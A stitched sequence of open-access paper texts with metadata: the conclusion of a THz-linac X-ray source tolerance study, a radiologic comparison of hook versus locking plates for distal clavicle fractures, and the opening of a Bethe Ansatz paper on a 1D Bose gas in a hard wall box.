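print(f"required duration ~ {tau * 1e9:.2f} ns, pulse energy ~ {energy * 1e3:.0f} mJ")
```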
Manufacturing of the dielectric-loaded waveguide
According to Figure 8 (a), the THz pulse phase velocity vph in the THz linac is very sensitive to a dielectric thickness variation. In fact, keeping the vph variation below 1‰ requires a dielectric thickness precision in the DLW manufacturing better than 150 nm, which is currently not achievable. However, as visible in Figure 8 (b), vph also depends on the THz pulse frequency f, and an error on the dielectric thickness can be compensated by a change of f (typically 2 GHz/μm). It has been demonstrated experimentally that the frequency of a THz pulse generated by optical rectification of a laser pulse in a non-linear optical crystal is tuneable by changing the crystal temperature (for example with a cryostat), at a rate around 0.3-0.4 GHz/K [42,43]. The expected error on the DLW dielectric thickness could (and actually would have to) be compensated by adjusting the temperature of the crystal generating the THz pulse. A 1‰ control level on vph translates into a 1 K control level on the crystal temperature, currently achievable with commercially available cryostats. Table 4 shows how a 1‰ control level on vph affects the electron bunch properties by comparing those obtained for vph = 0.999c and 1.001c, after adjustment of the solenoid peak field, THz linac phase and quadrupole gradients, with the reference ones for vph = c (also shown in Table 1). A decrease to vph = 0.999c comes with an increase of σE of around 50% and is therefore an issue. However, σE is preserved (and even slightly decreased) under an increase to vph = 1.001c. This suggests changing vph for the reference working point from c (assumed in this paper) to a slightly higher value. It will therefore be interesting for future studies to investigate up to which vph > c the bunch properties are preserved after proper adjustment of the solenoid peak field, THz linac phase and quadrupole gradients. The objective will be to see if vph can be sufficiently increased above c to avoid the rapid increase of σE observed for vph < c, and also to refine the required level of control on vph.
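As a back-of-envelope illustration of this compensation scheme, using the two rates quoted above (the thickness error itself is an assumed example):

```python
# Compensating a DLW dielectric-thickness error by retuning the THz frequency
# through the crystal temperature, with the rates quoted in the text.
df_per_um = 2.0      # GHz of frequency shift per um of thickness error (quoted)
df_per_K  = 0.35     # GHz per K of crystal temperature (quoted 0.3-0.4 GHz/K)

thickness_error_um = 0.5                    # assumed manufacturing error
delta_f = df_per_um * thickness_error_um    # frequency shift to apply
delta_T = delta_f / df_per_K                # required crystal temperature change

print(f"{thickness_error_um} um error -> shift f by {delta_f:.1f} GHz "
      f"-> retune crystal by ~{delta_T:.1f} K")
```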
Conclusions
We have presented an in-depth tolerance study and investigation of the main challenges towards the realization of a hybrid and compact ultrafast (fs to sub-fs) X-ray pulse source, for which a schematic is shown in Figure 1. These investigations allow defining which electron bunch properties are the most affected and the corresponding tolerances for each beamline region.
For the RF-gun region, the stability of the gun parameters (field amplitude and phase) has to be at, or even beyond, the current state-of-the-art to be satisfactory, which represents one of the main challenges. On the other hand, the tolerances for the stability of the UV laser energy and pointing and the solenoid peak field are more relaxed and less challenging.
For the THz linac, a field amplitude stability better than 1% rms is necessary, which is challenging but compatible with the current state-of-the-art of laser pulse energy stability. The question of the THz source phase stability still needs to be investigated, but will surely be one of the main challenges since it has to be significantly better than 1° (≡ 10 fs at 300 GHz). Another potentially challenging aspect is the THz linac alignment. Its translations and rotations relative to the perfect alignment have to be kept below 200 μm and 1 mrad, respectively. While this is well within the current absolute precision of positioning devices, the alignment precision will ultimately be determined by the beam-based alignment procedure used to position the THz linac relative to the other beamline elements, and might therefore be worse.
For the quadrupole triplet, all the tolerances in terms of gradient stability and alignment have been found to be compatible with the current state-of-the-art, the tightest one being to keep the second quadrupole offset below 50 μm.
For the ICS interaction region, a synchronization at the few-ps level between the electron bunch and the laser, achievable with current technology, is sufficient. The transverse offset between the bunch and the laser at the interaction point has to be kept below the few-μm level. This has been shown to be achievable in terms of electron bunch pointing jitter at the interaction point under the jitters assumed in this paper for all the beamline elements. The laser transverse size optimization to maximize the SPD is found to become more challenging when the bunch transverse size and energy spread increase, because the laser and electron bunch transverse sizes are then significantly different and the variations around the SPD maximum become sharper.
The requirements in terms of THz pulse properties to drive the THz linac have not yet been fulfilled all at once with current technology. However, recent progress in laser-based THz generation gives optimism that this challenge will soon be solved.
Finally, the very tight precision required for the DLW manufacturing to control the THz pulse phase velocity is an issue. However, a tuning of the THz pulse frequency (achievable by tuning the crystal temperature in laser-based THz generation) would allow compensating the manufacturing errors and retrieving a value close to the desired phase velocity. An important future study will thus be to determine the required control level on the phase velocity, by determining in which range the electron bunch properties can be preserved through a proper adjustment of only the solenoid peak field, THz linac phase and quadrupole gradients.
"year": 2020,
"sha1": "57b05443a5ae575b4c0ef0aa96d0f84a435f80b3",
"oa_license": null,
"oa_url": "https://doi.org/10.1088/1742-6596/1596/1/012032",
"oa_status": "GOLD",
"pdf_src": "IOP",
"pdf_hash": "0f45a468517c95c53f7ab845f111fa19bad46fa3",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
The Radiologic Comparison of Operative Treatment Using a Hook Plate versus a Distal Clavicle Locking Plate of Distal Clavicle Fracture
Background: The purpose of this study was to compare the radiologic results of patients who underwent surgery with a hook plate and with a locking plate for distal clavicle fractures. Methods: Sixty patients underwent surgical treatment for Neer type IIa, IIb, III, and V distal clavicle fractures. Twenty-eight patients underwent fracture fixation with a hook plate and 32 with a locking plate. Coracoclavicular distance was measured on standard anteroposterior radiographs before and after the surgery, and union was confirmed by radiograph or computed tomography taken at 6 months postoperatively. Other radiologic complications, such as osteolysis, were also assessed. Results: Bony union was confirmed in 59 out of 60 patients; 1 patient in the hook plate group showed delayed union. Coracoclavicular distance decreased more in the hook plate group after surgery (p<0.01). At 6 weeks after hook plate removal, the coracoclavicular distance had increased slightly compared to before metal removal, but there was no difference compared to the contralateral shoulder. Eleven out of 28 patients (39.3%) in the hook plate group showed osteolysis on the acromial undersurface. Conclusions: Both the hook plate group and the locking plate group showed satisfactory radiologic results in distal clavicle fractures. Both the hook plate and the locking plate can be good treatment options if used with the proper indications in distal clavicle fractures with acromioclavicular subluxation or dislocation.
Introduction
Distal clavicle fractures account for about 15% to 25% of all clavicle fractures. 1,2) Many surgical techniques for unstable distal clavicle fractures requiring surgical treatment, such as fixation with Kirschner wire (K-wire), 3) the Weaver-Dunn operation, 4) tension band wiring, 3,5) coracoclavicular screw fixation, 6-8) fixation with a plate, 9-12) and arthroscopic coracoclavicular ligament repair using an endobutton, 13) have been introduced. Among metal plate fixation techniques, the use of a hook plate facilitates reduction of superior migration of proximal bone fragments and maintenance of reduction, and makes it possible to maintain reduction indirectly, without direct fixation of distal fragments with screws, when the distal fragments are very small. 14) However, subacromial osteolysis is more likely to occur in the subacromial space where the hook plate is placed, 15,16) and it is impossible to recover the full range of motion (ROM) while the hook plate is in place. Therefore, it is known that it is better to remove the hook plate within 6 months after surgery. However, 6 months may not be sufficient for fracture healing. 17) In addition, side effects such as rotator cuff tears, subacromial impingement syndrome, 18) and periprosthetic fractures 19) have been reported. On the other hand, fixation with a locking plate involves the difficulty of direct placement of screws on distal fragments, and has the disadvantage that it cannot be performed if distal fragments are small. 20) In addition, distal clavicle fractures accompanied by a rupture of the coracoclavicular ligament have the problem that the coracoclavicular distance is not easily restored without direct repair or reconstruction of the coracoclavicular ligament, 21) but the above-mentioned disadvantages of hook plates can be avoided or overcome. In this study, we aim to compare the radiological results of patients with distal clavicle fractures who were surgically treated with a hook plate or a locking plate.
Methods
The subjects were 60 patients who underwent internal fixation with a 3.5 mm LCP Clavicle Hook Plate (Synthes, West Chester, PA, USA) or a Locking Clavicle Plate (Hankil Techmedical Co., Hwaseong, Korea) from 2009 to 2017 among patients with Neer type IIa, IIb, III, and V distal clavicle fractures. Patients who had Neer type I or IV distal clavicle fractures, received conservative treatment, underwent fixation with only K-wires or screws, or underwent coracoclavicular ligament reconstruction were excluded from this study. Among the subjects, 28 patients underwent surgery with a hook plate, and 32 patients with a locking plate. Metal removal was performed when we were able to detect signs of fracture healing on plain radiographs or computed tomography images (CT) taken at 6 months after surgery. Since complications such as osteolysis or fracture may occur in patients who underwent surgery with a hook plate, we planned to perform implant removal if fracture union was detected 6 months after surgery; locking plate removal was performed within one year after surgery at the latest. At 6 weeks after implant removal, clavicular anteroposterior plain radiographs were taken, and the coracoclavicular distance of both the left and right sides was measured. In addition, when a hook plate was used, it was also examined whether osteolysis around the hook or other complications, such as a fracture, had occurred.
Surgical Methods and Postoperative Management
Under general anesthesia, the patient was placed in the beach chair position and a skin incision was made over the distal clavicle fracture site using the standard approach. After exposing the fracture site and performing reduction, fixation was performed with a locking plate when it was possible to place at least three screws in the distal fragment; when the distal fragments were too small or the fracture was severely comminuted, they were fixed with a hook plate (Fig. 1, 2). After confirming that satisfactory reduction was achieved using C-arm fluoroscopy, fixation was performed using a metal plate and screws. Additional reduction and fixation of displaced bone fragments were performed with a K-wire or wire loop if necessary (Fig. 3). K-wires were additionally used in 1 case in the hook plate group and in 4 cases in the locking plate group, and a wire loop was additionally used in 1 case in the hook plate group. No patient in either group underwent coracoclavicular ligament repair. All the patients wore a shoulder immobilizer for 6 weeks postoperatively, and active ROM exercises of the elbow joint, wrist joint, and fingers were performed immediately after surgery. At 6 weeks postoperatively, the shoulder immobilizer was removed and active ROM exercises of the shoulder joint were begun.
Statistical Analysis
Statistical analysis was performed using IBM SPSS ver. 22 (IBM Co., Armonk, NY, USA). The independent t-test and chi-square test were performed; the significance level was defined as 0.05, and a p-value less than 0.05 was considered to indicate a statistically significant difference.
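As a hedged illustration of these tests with open-source tools (scipy in place of SPSS), the sketch below runs an independent t-test and a chi-square test on hypothetical placeholder data; the per-patient values and the per-group split of fracture types are invented for illustration and are not the study data:

```python
# Illustrative re-creation of the reported statistical tests with scipy.
import numpy as np
from scipy import stats

# Independent t-test, e.g. postoperative coracoclavicular distance (mm);
# these arrays are hypothetical, not the measured patient values.
hook    = np.array([6.1, 7.4, 5.9, 8.0, 6.5])
locking = np.array([10.2, 11.5, 9.8, 12.0, 10.9])
t_stat, p_t = stats.ttest_ind(hook, locking)

# Chi-square test on a 2x4 table of Neer fracture types per group; the column
# totals match the paper (23/18/1/18), the per-group split is hypothetical.
table = np.array([[11, 8, 0, 9],     # hook plate group (n = 28)
                  [12, 10, 1, 9]])   # locking plate group (n = 32)
chi2, p_chi, dof, expected = stats.chi2_contingency(table)

alpha = 0.05
print(f"t-test p = {p_t:.4f}; chi-square p = {p_chi:.4f} (alpha = {alpha})")
```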
Results
There was no statistical difference in demographic data between the two groups (Table 1). The 60 cases of distal clavicle fractures comprised 23 cases of Neer type IIa, 18 of Neer type IIb, 1 of Neer type III, and 18 of Neer type V. There was no difference in fracture types classified according to the Neer classification between the two groups (p=0.26) (Table 2). [Tables 1 and 2 footnote: values are presented as number (%) or mean ± standard deviation.] There were no specific complications after surgical treatment in any of the 60 patients. The mean operative time was 65.7 ± 14.8 minutes in the hook plate group and 70.5 ± 17.2 minutes in the locking plate group; there was no significant difference between the two groups (p=0.25). Complete fracture healing was obtained in 59 out of 60 patients. One patient who underwent surgery with a hook plate showed delayed union at 6 months postoperatively. In this patient, X-rays taken immediately after surgery showed that the hook plate was properly placed under the acromion (Fig. 4B), but the hook gradually migrated into the acromion during the follow-up period, so we decided to remove the metal plate 6 months after surgery. Although the X-ray taken at 6 months postoperatively did not show fracture union, partial bone union was detected on CT (Fig. 4D), so refixation was considered unnecessary. Therefore, while removing the metal plate, only autogenous iliac bone grafting was performed at the site showing delayed union. The X-ray taken 3 months after that surgery showed radiographic findings of complete fracture union (Fig. 4E). In 11 of 28 patients (39.3%) who were surgically treated with a hook plate, osteolysis of the acromion where the hook plate was located was detected, but there were no complications such as fractures (Fig. 5). The mean coracoclavicular distance before surgery was 19.4 ± 4.3 mm in the hook plate group and 17.7 ± 6.7 mm in the locking plate group. After surgery, the mean coracoclavicular distance was 6.8 ± 3.3 mm in the hook plate group and 10.8 ± 2.5 mm in the locking plate group, significant decreases compared to the preoperative measures (p<0.01). As for the value obtained by subtracting the coracoclavicular distance of the uninjured side from that of the injured side (henceforth, CCDD), the preoperative mean value was 10.3 ± 4.3 mm in the hook plate group and 9.4 ± 6.2 mm in the locking plate group, with no statistically significant difference between the two groups (p=0.51). After surgery, the mean CCDD values were -1.9 ± 3.4 mm in the hook plate group and 3.0 ± 2.5 mm in the locking plate group, showing that an overcorrection was made in the hook plate group compared to the degree of reduction in the locking plate group (p<0.01), and that there was a significant decrease in both groups compared to the preoperative values (Table 3).
Twenty-six out of 28 patients in the hook plate group underwent implant removal, at a mean of 7.7 months (4.6 to 14.1 months) after surgery. In the locking plate group, 23 out of 32 patients underwent implant removal, at a mean of 13.5 months (8.8 to 35.9 months) after surgery. In the locking plate group, there was almost no change in the coracoclavicular distance before and after implant removal. In the hook plate group, the X-ray taken at 6 weeks after implant removal showed that the coracoclavicular distance had slightly increased to 8.22 ± 2.62 mm compared to the values before implant removal, but CCDD was measured to be -0.30 ± 2.48 mm, showing almost no difference in the coracoclavicular distance between the injured side and the contralateral side (Table 4). [Tables 3 and 4 footnote: values are presented as mean ± standard deviation. CCD: coracoclavicular distance of the injured side as measured on anteroposterior (AP) radiographs; CCDD: coracoclavicular distance of the injured side minus that of the uninjured side as measured on bilateral AP radiographs.]
Discussion
In this study, fracture union was obtained without major complications in both the hook plate group and the locking plate group for distal clavicle fractures. There was no difference in operative time between the two groups, and in both groups there was a significant decrease in the coracoclavicular distance, which had been increased preoperatively.
Unlike hook plates, locking plates cannot fix the acromioclavicular joint. However, in most distal clavicle fractures there is no rupture of the acromioclavicular ligament and the coracoclavicular ligament remains attached to the distal bone fragment, so the coracoclavicular distance is expected to improve with fracture reduction alone. 22) In this study, we likewise confirmed reduction of the coracoclavicular distance in all patients who underwent surgery with a locking plate. However, the coracoclavicular distance differed by about 3.0 mm from that of the uninjured side. This finding suggests that the coracoclavicular distance cannot be fully maintained if only fracture reduction is performed without stabilizing the coracoclavicular ligament. In the hook plate group, a slight overcorrection of the coracoclavicular distance was found relative to the uninjured side. This can be attributed to the fact that overcorrection was attempted intentionally to avoid loss of reduction after implant removal. In acromioclavicular joint dislocations, where both the acromioclavicular and coracoclavicular ligaments are ruptured, a partial loss of reduction is commonly observed after implant removal when fixation is performed using a hook plate. 23) In this study, however, reduction of the coracoclavicular distance was maintained even after the hook plate was removed. This is presumably because the acromioclavicular ligament is intact and the coracoclavicular ligament is at least partially attached to the bone fragments in most distal clavicle fractures.
It is known that the clinical results of distal clavicle fractures do not differ significantly between cases in which the difference in coracoclavicular distance between the injured and uninjured sides is 10% or greater and cases in which it is less than 10%, 21) so the clinical implications of this difference are not yet clear. However, continuous follow-up appears warranted, since complications requiring long-term observation, such as acromioclavicular arthritis, have not been studied.
When a hook plate is used, long-term fixation is limited by problems such as acromion fractures, 24,25) acromion osteolysis caused by the hook, 26) and reduced range of motion of the joint, 27) raising the concern of whether fixation can be maintained long enough for fracture union to be achieved. In this study, complete fracture healing was achieved by about 6 months after surgery in all but one of the 28 patients treated with a hook plate. In that one patient, delayed union was detected and implant removal was performed; complete bony union was then achieved with autogenous bone grafting alone, without additional fixation. As shown in Fig. 4, CT taken 6 months after surgery showed migration of the hook into the acromion, so we judged that plate removal was necessary because of the risk of fracture, despite the partial union. In this case, fracture union was expected to be difficult to obtain because of the severe fragmentation and displacement of the fracture before surgery, so it is difficult to attribute the partial union at 6 months to the use of the hook plate itself. In distal clavicle fractures, 6 months of fixation is thought to be sufficient time to obtain fracture union. Moreover, when surgery is performed with a hook plate, extensive subperiosteal dissection is unnecessary, because a hook plate, unlike a locking plate, does not require anatomical reduction. The use of a hook plate therefore allows fixation with minimal disruption of the blood supply to the cortical bone, which may be helpful for fracture union.
Erdle et al. 23) reported that the degree of correction of the coracoclavicular distance was greater when a hook plate was used than when a locking plate was used, but that the coracoclavicular distance remained larger than on the uninjured side. In this study, by contrast, the coracoclavicular distance in the hook plate group was measured to be smaller than on the uninjured side. This reflects our intentional slight overcorrection relative to the uninjured side, made in anticipation that the coracoclavicular distance might increase after implant removal. As a result, the coracoclavicular distance was smaller than that of the uninjured side while the hook plate was in place, but after the hook plate was removed it recovered to almost the same level as the uninjured side.
In this study, we detected signs of osteolysis at the location of the hook plate in about 40% (11 of 28) of the patients treated with a hook plate, and the hook plate migrated into the acromion in 2 cases. The incidence of osteolysis was not higher than in other studies, 18,26,28) and no major complications occurred, such as a fracture due to osteolysis or a fracture at the medial side of the hook plate. 24,25) This is likely because the plates were removed relatively early rather than being left in the body for a long time.
This study has several limitations which need to be pointed out. First, it is a retrospective study; a prospective study is considered difficult to conduct because the choice of plate fixation technique depends on the fracture type, even at the same fracture site. Second, the types of fixation device were not randomly assigned. As noted regarding the first limitation, different plates were used depending on the type of fracture: when the distal fragment was long enough to accept three or more screws, a locking plate was applied to achieve anatomical reduction, whereas when the distal fragment was too short, fixation was performed with a hook plate without extensive subperiosteal dissection. This is an unavoidable choice given the features of each fixation device, and because the choice of device was not based on the coracoclavicular distance, we believe this factor did not have a significant impact on the results of this study. Third, we made no comparison of clinical outcomes. However, both methods are known to yield relatively good clinical outcomes, 14) and this study focused on comparing radiological results between the two surgical techniques, since fracture union was ultimately achieved in all patients without major complications.
Conclusion
Radiological evaluation of surgically treated displaced distal clavicle fractures confirmed satisfactory fracture reduction and bony union in both the hook plate group and the locking plate group. The coracoclavicular distance was decreased more in the hook plate group than in the locking plate group, and fracture reduction was also maintained more stably in the hook plate group after plate removal. Although radiographs frequently showed osteolysis, there were no radiological findings of problems such as fractures when implant removal was performed approximately 6 months after surgery. | 2019-03-28T13:33:58.345Z | 2018-12-01T00:00:00.000 | {
"year": 2018,
"sha1": "f7865e1af4f2dfdc068cecef3d3fc7926c3d00c2",
"oa_license": "CCBYNC",
"oa_url": "https://www.cisejournal.org/upload/pdf/CISE021-04-09.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "d136c7bb265622e05085ace097147889656c3150",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
17067769 | pes2o/s2orc | v3-fos-license | The 1D interacting Bose gas in a hard wall box
We consider the integrable one-dimensional delta-function interacting Bose gas in a hard wall box which is exactly solved via the coordinate Bethe Ansatz. The ground state energy, including the surface energy, is derived from the Lieb-Liniger type integral equations. The leading and correction terms are obtained in the weak coupling and strong coupling regimes from both the discrete Bethe equations and the integral equations. This allows the investigation of both finite-size and boundary effects in the integrable model. We also study the Luttinger liquid behaviour by calculating Luttinger parameters and correlations. The hard wall boundary conditions are seen to have a strong effect on the ground state energy and phase correlations in the weak coupling regime. Enhancement of the local two-body correlations is shown by application of the Hellmann-Feynman theorem.
Introduction
Quantum Bose and Fermi gases of ultracold atoms continue to attract considerable interest since the experimental realization of atomic Bose-Einstein condensates (BEC) [1,2,3,4] and the pair condensation of fermionic atoms [5,6,7]. Particular attention has been paid to one-dimensional (1D) Bose gases, which are seen to exhibit the rich and novel effects of quantum many-body systems [8,9,10,11,12,13,14,15]. As a consequence, there has been a revival of interest in the exactly solved 1D model of interacting bosons. It is well known that the δ-function interacting Bose gas is integrable [16,17] and can be realized via short-range interactions with an effective coupling constant g_{1D} [9]. This constant is determined through an effective 1D scattering length a_{1D} ≈ a_⊥²/a, where a_⊥ is the characteristic length along the transverse direction and a is the 3D scattering length. The ratio of the average interaction energy to the kinetic energy, γ = m g_{1D}/(ℏ²n), is used to characterize the different physical regimes of the 1D quantum gas. Here m is the atomic mass and n is the boson number density. In the weak coupling regime, i.e., γ ≪ 1, the wave functions of the bosons are coherent. In this regime, the density fluctuations are suppressed and the phase correlations decay algebraically at low temperatures. Thus the 1D Bose gas can undergo a quasi BEC. However, in the opposite limit, i.e., the Tonks-Girardeau limit γ ≫ 1, the bosons behave like impenetrable hard core particles, the so called Tonks-Girardeau gas [18]. In this regime the single-particle wave functions become decoherent and the system acquires fermionic properties.
The 1D Bose gas is realized experimentally by tightly confining the atomic cloud in two (radial) dimensions and weakly confining it along the axial direction. The motion along the radial direction is then frozen to zero point oscillations [19,20,21,22,23], making the gas effectively one-dimensional. Anisotropic trapping along the radial and axial directions can form either a 2D optical lattice or 1D tubes. There have been two types of 1D quantum gases, the lattice Bose gas [19,20,21] and the continuum Bose gas confined in a harmonic potential along the axial direction [22] (see figure 1). From a theoretical point of view, the former is usually described by the Bose-Hubbard model while the latter is described by the 1D interacting Bose gas. The Bose-Hubbard model is not integrable, except for a special case [24], which corresponds to two sites. On the other hand, the trapping potential along the axial direction breaks the integrability of the 1D Bose gas. However, the long-wavelength properties of the 1D Bose gas and the Bose-Hubbard model can be described by a Luttinger liquid, owing to the universality of the low energy excitations, i.e., gapless excitations with a linear low-energy excitation spectrum and power-law decay in the correlations [25].
The exactly solved 1D interacting Bose gas has been extensively studied [26,27,28,29,17,30,31,32,33,34]. The ground state energy and low energy excitations [16,35], thermodynamic behaviour [36], finite-size effects [37], correlation functions [27,38] and Luttinger liquid behaviour [39,40,41] have been investigated via various methods. The signature of the 1D Bose gas is strongly influenced by the interaction strength and the external trapping potential. The effects of spatial inhomogeneity and finite temperature are other considerations to be taken into account under experimental conditions. To this end, several approximation schemes have been adopted to describe the main features of the 1D trapped Bose gas. In particular, the local density approximation [11,42,43,44] is widely used for calculating the density profiles of bosons and fermions in harmonic traps. Now for a finite number of bosons and finite system size, boundary effects are expected to be pronounced at low temperature [45,46,47]. Indeed, significantly different quantum effects should be exhibited by a finite number of bosons confined in a finite hard wall box. For example, in the weak coupling regime, macroscopic states lie on the zero point oscillations as if the system undergoes BEC. The density expectation value exhibits Friedel oscillations and the correlation decay is slower than in the periodic case, due to the enhancement of the density and phase stiffness. The boundary conditions also have an effect on the phase correlations near the boundaries. The ground state of the 1D interacting Bose gas with hard wall boundary conditions has no momentum pairing (with a −k for each k), in contrast to the periodic case, because of the missing translational symmetry. The hard wall boundary conditions have been experimentally realized by square potentials with very high barriers [48]. Most recently, a BEC has been produced in a novel optical box trap [49], in which atom numbers are as small as 5 × 10². More experiments in this direction can be anticipated [50,51]. These are our motivations for studying the ground state properties of the 1D interacting Bose gas confined in a hard wall box.
The 1D interacting Bose gas with hard wall boundaries was solved by Gaudin in the early 1970's [52]. Gaudin calculated the surface energy via the Bethe Ansatz solution in the thermodynamic limit. Very recently, this model was studied via Haldane's harmonic liquid theory [47,40], which describes the long wave-length properties of the 1D fluid in terms of the density and phase fluctuations. The correlation functions of the Tonks-Girardeau gas have also been studied with hard wall boundary conditions [53].
The paper is organized as follows. In Section 2, we present the Bethe Ansatz wave functions and Bethe equations for the 1D interacting Bose gas with hard wall boundary conditions. Details of the Bethe Ansatz solution are given in Appendix A. In Section 3, we derive the ground state energy via asymptotic roots of the Bethe equations in the strong and weak coupling limits. We derive the surface energy through the continuum integral equations in Section 4. In Section 5, we calculate the ground state energy in the strong and weak coupling limits using Wadati's power series expansion method [31,54,55]. A discussion of the connection between the 1D Bose gas trapped by an harmonic potential and the exactly solved model is given in Section 6. The low-energy properties are discussed in Section 7, with concluding remarks given in Section 8.
The Bethe Ansatz solution
The 1D quantum gas of N bosons with δ-function interaction in a hard wall box of length L is described by the Hamiltonian

H = −(ℏ²/2m) Σ_{i=1}^{N} ∂²/∂x_i² + g_{1D} Σ_{1≤i<j≤N} δ(x_i − x_j),    (1)

where the hard walls are defined via the boundary conditions [52]

Ψ(x_1 = 0, x_2, . . . , x_N) = 0,    Ψ(x_1, x_2, . . . , x_N = L) = 0.    (2)
Here g_{1D} = ℏ²c/m is an effective 1D coupling constant with scattering strength c. The wavefunction Ψ must be totally symmetric in all its arguments, as required for a bosonic system. For harmonic trapping along the axial direction, the scattering strength is given by c = 2/|a_{1D}|. The trapping potential should be added to the Hamiltonian (1) as an external field. However, harmonic potentials appear to break the integrability of the model. Fortunately, the integrability of the model is preserved by the hard wall boundary conditions [52]. This provides us with an opportunity to study the signature of the 1D Bose gas in a hard wall box in an exact fashion. For simplicity, we set ℏ = 2m = 1 in the following.
The explicit solution of the model via the coordinate Bethe Ansatz is described in Appendix A. The wavefunction is given by equation (3), in which the sum extends over all N! permutations P and all signs ε_i = ± (see Appendix A). The wavefunction is valid in the domain 0 ≤ x_1 < . . . < x_N ≤ L and can be continued via symmetry in all coordinates x_i. The wavefunction coefficients A(ε_1 k_{P1}, · · · , ε_N k_{PN}) are determined by the Bethe roots, or wave numbers, k_i via equation (4), in which (−)^P denotes a (±) sign factor associated with even/odd permutations. The wave numbers satisfy the Bethe equations

exp(2i k_j L) = ∏_{ℓ≠j} (k_j − k_ℓ + ic)(k_j + k_ℓ + ic) / [(k_j − k_ℓ − ic)(k_j + k_ℓ − ic)],    j = 1, . . . , N.    (5)

The energy eigenvalues are as usual given by

E = Σ_{j=1}^{N} k_j².    (6)

Like the periodic boundary condition case [27], the Bethe roots k_i are known to be real for repulsive interactions (c > 0), but they may become complex for attractive interactions (c < 0). Here we consider the repulsive regime. Free bosons are recovered for c = 0, i.e., k = πn/L, n ∈ ℕ (see Appendix A).
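For readers who wish to obtain the Bethe roots numerically, the following sketch solves the logarithmic form of equations (5) for the ground state by damped fixed-point iteration. It assumes the hard-wall Bethe equations in the form written above, with quantum numbers m_j = j for the ground state, and works in units ℏ = 2m = 1; it is an illustration, not the authors' code.

```python
import numpy as np

def hardwall_bethe_roots(N, L, c, tol=1e-12, max_iter=100000):
    """Ground-state Bethe roots, assuming the logarithmic form
    k_j L = pi*j - sum_{l != j} [arctan((k_j - k_l)/c)
                                 + arctan((k_j + k_l)/c)]."""
    j = np.arange(1, N + 1)
    k = j * np.pi / L  # c -> infinity (Tonks-Girardeau) starting guess
    for _ in range(max_iter):
        phase = (np.arctan((k[:, None] - k[None, :]) / c)
                 + np.arctan((k[:, None] + k[None, :]) / c))
        np.fill_diagonal(phase, 0.0)  # exclude the l = j term
        k_new = (np.pi * j - phase.sum(axis=1)) / L
        if np.abs(k_new - k).max() < tol:
            return k_new
        k = 0.5 * k + 0.5 * k_new  # damping for stability at small c
    return k

k = hardwall_bethe_roots(N=10, L=10.0, c=100.0)
print("ground state energy E =", np.sum(k**2))  # units hbar = 2m = 1
```

As simple checks, the roots approach jπ/L as c grows large and collapse towards π/L as c approaches zero, consistent with the free-fermion and free-boson limits noted in the text.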
Asymptotic solutions to the Bethe equations
In contrast with periodic boundary conditions, the ground state no longer contains ± momentum pairs, due to the reflection of quasi-momenta at the boundaries. As a result the total quasi-momentum Σ_{j=1}^{N} k_j is not conserved in this case. We first examine the asymptotic solutions of the Bethe equations (5) in the strong and weak coupling limits.
Tonks-Girardeau regime
It is well known that in the strong coupling regime, i.e., γ ≫ 1, the 1D Bose gas with repulsive interaction behaves like a gas of weakly interacting fermions [51]. In the limiting case c = ∞ the exact solution for periodic boundary conditions and harmonic trapping has been given for impenetrable bosons [18,14]. In the hard wall setting the fermionic behaviour can be seen from the ground state energy. Define the variables z_j = Lk_j/N and γ = Lc/N. Then for γ ≫ 1/N the Bethe equations (5) can be written in the asymptotic form (7), in which the summations exclude ℓ = j and ℓ′ = j. Here we restrict the solutions to z_j > 0. The asymptotic Bethe roots for the ground state energy follow from the condition that the equations (7) be consistent. It follows that in this limit the ground state energy per particle is given by equation (9). We emphasize that these asymptotic solutions are very accurate for the Tonks-Girardeau regime. We will compare the ground state energy (9) with numerical solutions of the continuum integral equation, which is the hard-wall analogue of the Lieb-Liniger integral equation, in Section 4. The explicit form for the wave numbers k_j also allows an in-principle calculation of the asymptotic correlation functions directly from the wave function (3). Switching back to real physical units, the ground state energy per particle (9) can also be written in the form (10), where the bulk energy e₀(γ) and the surface energy e_f(γ) are given by equations (11) and (12). A useful quantity is the 1D temperature T_{1D} = 2E/(N k_B), which is just the ground state energy in different units [22]. We plot T_{1D} obtained from (10) as a function of the interaction strength γ in figure 2 for a gas of N = 37 bosons confined in boxes of length L = 35.25 µm and L = 32.61 µm. These are the same parameters as in Figure 3 of Ref. [22]. The dashed horizontal lines are the corresponding values of T_{1D} in the Tonks-Girardeau limit. We remark that for hard wall boundary conditions, the particle density distribution is rather flat and homogeneous. It can be seen that T_{1D} increases rapidly as γ increases in the weak coupling regime. It then slowly approaches the Tonks-Girardeau energy as γ tends to infinity. In an actual experiment, the length of the atomic cloud varies with the interaction strength, in which case T_{1D} will increase smoothly as γ increases. Most significantly, T_{1D} is sensitive to the length of the hard wall box: the smaller the box, the larger the 'quasi-momentum' of the particles. We note also that the surface energy is positive. In the thermodynamic limit, the ground state energy for periodic boundary conditions is proportional to the linear density n. Therefore, in the thermodynamic limit, the ground state of the Bose gas in a hard wall box can be considered as an excited state of a Bose gas with 2N particles in a periodic box of length 2L [52]. We will study the ground state properties for the hard wall box further in Section 4.
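In the c → ∞ limit the ground-state roots reduce to k_j = jπ/L, so the energy per particle can be checked in closed form. The sketch below (units ℏ = 2m = 1) verifies the resulting bulk-plus-surface structure, where the decomposition shown is a simple algebraic identity rather than a quotation of equations (9)-(12); note the positive 1/(2N) surface term, consistent with the remark above that the surface energy is positive.

```python
import numpy as np

def tg_energy_per_particle(N: int, L: float) -> float:
    """Exact c -> infinity (Tonks-Girardeau) ground-state energy per
    particle for the hard-wall box, from k_j = j*pi/L."""
    return (np.pi / L) ** 2 * (N + 1) * (2 * N + 1) / 6.0

# Identity: E/N = (pi*n)^2 * (1/3 + 1/(2N) + 1/(6N^2)) with n = N/L,
# i.e. a bulk term plus a positive O(1/N) surface correction.
N, L = 37, 35.25
n = N / L
assert np.isclose(tg_energy_per_particle(N, L),
                  (np.pi * n) ** 2 * (1/3 + 1/(2*N) + 1/(6*N**2)))
print(tg_energy_per_particle(N, L))
```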
Weak coupling regime
